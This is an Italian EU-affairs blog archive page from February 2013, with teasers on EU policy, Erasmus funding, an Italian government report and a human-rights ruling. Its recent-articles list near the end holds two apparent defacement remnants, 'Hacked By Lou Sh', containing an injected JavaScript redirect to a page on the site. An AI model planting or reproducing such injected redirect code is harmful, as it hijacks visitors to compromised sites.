EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Febbraio 2013
it

Il concorso “L'Europa è casa tua”, bandito dall'IIC in collaborazione con il Ministero dell'Istruzione, dell'Università e della Ricerca, prende le mosse in questi giorni.

I due organismi puntano a sollecitare i partecipanti a rispondere con elaborati artistici a dei precisi quesiti: dove è l’Europa? Quanto è lontana da noi? Quali sono le differenze tra noi e gli altri cittadini europei? Quali diritti acquisiamo in qualità di appartenenti all’Unione europea? Il (...)

it

Il piano, sotto la guida di Catherine Ashton, rappresentante UE per gli Affari Esteri, prevede la ridefinizione dei confini israelo-palestinesi: Bruxelles vorrebbe tornare alla creazione di un nuovo Stato palestinese entro i confini del 1967 con Gerusalemme Est come capitale. Previsto inoltre il "congelamento" di tutte le infrastrutture progettate o in via di realizzazione nelle colonie israeliane in Cisgiordania e "lo scambio di territori tra Israele e Palestina".

Se ne è discusso recentemente in occasione del discorso di Barack Obama sulla situazione in Medio Oriente. I territori in questione, come tutti sappiamo, sono stati da sempre alla base di tutte le trattative tra israeliani e palestinesi: Obama li ripropone perché, a suo dire, sarebbero l’unica (...)

it

In attuazione della legge n. 234 lo scorso 18 gennaio Il Dipartimento delle politiche europee, ha trasmesso al Parlamento Italiano la Relazione programmatica per il 2013. Emanata il 24 Dicembre 2012 ci si sofferma sulle norme generali della partecipazione Italiana alla formazione e all'attuazione della normativa e delle politiche dell'Unione europea. La Relazione Programmatica il documento, approvato all’inizio di ogni anno, contiene la descrizione degli obiettivi che si vogliono raggiungere nei successivi 12 mesi e dei progetti possibili per poterli realizzare a livello concreto.

Ratificata dal Consiglio dei Ministri, la Relazione è stata approvata in concomitanza con la fine del Governo tecnico in Italia e di conseguenza, come ha spiegato Enzo Moavero Milanesi, Ministro per gli Affari Europei, essa si limita ad avere una funzione puramente informativa, spetterà poi al (...)

it

Il secondo capitolo della relazione analizza gli orientamenti e le priorità nazionali italiane riguardo le più importanti politiche europee. Vengono esaminate l’integrazione del mercato interno e la ripresa della competitività, la dimensione esterna dell'Unione europea, come consolidare lo spazio comune di libertà, la sicurezza, la giustizia e le varie politiche dei settori (agricoltura e pesca, coesione, occupazione e politiche sociali, istruzione e politiche giovanili, industria – comprese energia e trasporti, ambiente, salute, tutela dei consumatori, cultura, turismo, fiscalità).

Una delle principali preoccupazioni per il 2013 è il rilancio del mercato interno. Nel 1992, sotto la guida di Jacques Delors, è stato promosso il libero scambio tra i paesi dell’Ue, attraverso le quattro libertà: libera circolazione di persone, merci, servizi e capitali. La strada per raggiungere (...)

it

Il terzo ed ultimo capitolo della relazione approvata dal Governo italiano analizza le iniziative e gli adempimenti dell’Italia nel quadro della partecipazione all’UE. Sono tre i settori presi in considerazione: prevenzione e risoluzione delle procedure d'infrazione al diritto dell'Unione Europea; tutela degli interessi finanziari e il contrasto delle frodi; comunicazione e informazione ai cittadini sull'attività dell'Unione stessa.

Nella prima parte il testo si sofferma sulle soluzioni da intraprendere per le infrazioni normative da parte dell’Italia nei confronti dell’Ue. L’Italia infatti, ha molte procedure di trasgressione aperte per fallito recepimento o per violazione delle norme Ue. Nello specifico, 19 di esse (...)

it

Il 21 febbraio 2013 a Torino, Cecilia Malmström, Commissaria europea per gli affari interni e responsabile per le tematiche della protezione e della sicurezza, sarà la protagonista del secondo Dialogo con i cittadini organizzato dalla Rappresentanza in Italia della Commissione europea in collaborazione con la città di Torino e il Sindaco Piero Fassino.

Il dibattito ha come obiettivo quello di sviluppare il dialogo e l’ascolto con i cittadini. Le tematiche principali dell’incontro di Torino sono diverse, ma tutte riconducibili alla delicata questione della protezione e della sicurezza dei cittadini: dai problemi legati alla libertà di (...)

it

Lo scorso 11 febbraio Connie Hedegaard, Commissaria Ue per l'Azione per il clima, ha lanciato l'iniziativa “Un mondo come piace a te”, (A World You Like), che rientra nella campagna “Un mondo come piace a te, con il clima che vuoi”, inaugurata lo scorso ottobre.

Dal suo avvio l’operazione ha raccolto oltre 20.000 follower e più di 130 partner ufficiali, come autorità pubbliche, organizzazioni non governative, imprese e rappresentanti del mondo universitario. Obiettivo dell’azione promossa dall’Ue è quello di rendere note le soluzioni più funzionali per (...)

it

Le coppie gay, potranno ora adottare, proprio come avviene per le etero, il figlio di uno dei partner avuto da una precedente relazione.

Parità di diritti per le coppie omosessuali. E’ quello a cui finalmente si sta per andare incontro dopo la sentenza della Corte Europea dei diritti umani, che ha dato ragione ad una coppia di donne austriache che avevano fatto ricorso dopo una precedente sentenza. La sentenza, definitiva perché (...)

it

Il 14 febbraio scorso è stata lanciata l’iniziativa “#AppelloGiovane”, campagna svincolata da qualsiasi logica partitica perché i giovani sono da considerare come una fascia della popolazione che un giorno sarà il futuro del nostro Paese.

La campagna è rivolta a tutto il sistema politico, ai cittadini e al nuovo governo che salirà presto a sedere in parlamento. La proposta nasce dal gruppo Giovani Italiani Bruxelles, già da tempo attivo per rilanciare il discorso giovanile in Italia, allo scopo di dare spazio e voce alle istanze (...)

it

Per i prossimi sette anni gli studenti che parteciperanno al Programma Erasmus possono stare tranquilli: nonostante i tagli effettuati al bilancio Ue durante l'ultimo Consiglio europeo, si è deciso che i programmi di mobilità giovanile avranno comunque un incremento del 40-50% circa rispetto agli anni passati.

La Commissione aveva proposto un incremento del 70% rispetto all’attuale bilancio settennale, che equivale ad uno stanziamento di 19 miliardi di euro. La Commissaria Ue all’Educazione, Androulla Vassiliou, chiarisce: “Ci troviamo in una posizione molto vantaggiosa sul bilancio pluriannuale. Non (...)

it

Partirà a marzo e avrà una durata di 3 anni, l'Osservatorio sulla bioeconomia presentato il 14 febbraio scorso dalla Commissaria per la Ricerca, l'innovazione e la scienza, Máire Geoghegan-Quinn. Monitorare i progressi e valutare l'impatto dello sviluppo della bioeconomia dell'UE, saranno gli obiettivi dell’iniziativa.

A un anno esatto dal lancio della strategia “L’innovazione per una crescita sostenibile: una bioeconomia per l’Europa” – che intendeva sottolineare la necessità di impegnarsi nell’utilizzo di risorse biologiche rinnovabili al fine di creare una società più innovatrice e un’economia a emissioni ridotte (...)

it

Un milione di firme in almeno sette Paesi europei. Con questo obiettivo è stata lanciata l’iniziativa europea per il pluralismo e la libertà dei media, che raccoglie più di cento associazioni e organizzazioni della società civile in tutto il Vecchio Continente. Con il raggiungimento del quorum (dal 7 febbraio è possibile firmare anche online all’indirizzo www.mediainitiative.eu), sarà possibile presentare una proposta di legge direttamente alla Commissione UE. A dimostrazione della bontà del progetto è arrivata la firma del Presidente del'Europarlamento Martin Schulz, che ha aperto, ci si può giurare, una promettente strada a tutela del pluralismo e della libertà di informazione

Molti di voi ricorderanno la scena finale del film “L’ultima minaccia”, in cui il giornalista Ed Hutcheson, interpretato da Humphrey Bogart, pronuncia al telefono sul rumore delle rotative: “è la stampa, bellezza”, fiero di aver respinto le minacce e sbattuto la verità in prima pagina. Il film (...)

it

Entro il prossimo giugno è prevista la presentazione dei progetti.

Il tema della migrazione è l’ambito in cui i partecipanti dovranno dedicare le loro riflessioni, che tradurranno successivamente in elaborati concreti. In un Europa che nel 2011 si è trovata ad accogliere nei suoi territori ben 20,2 milioni di cittadini di paesi terzi, (pari al 4% circa della (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France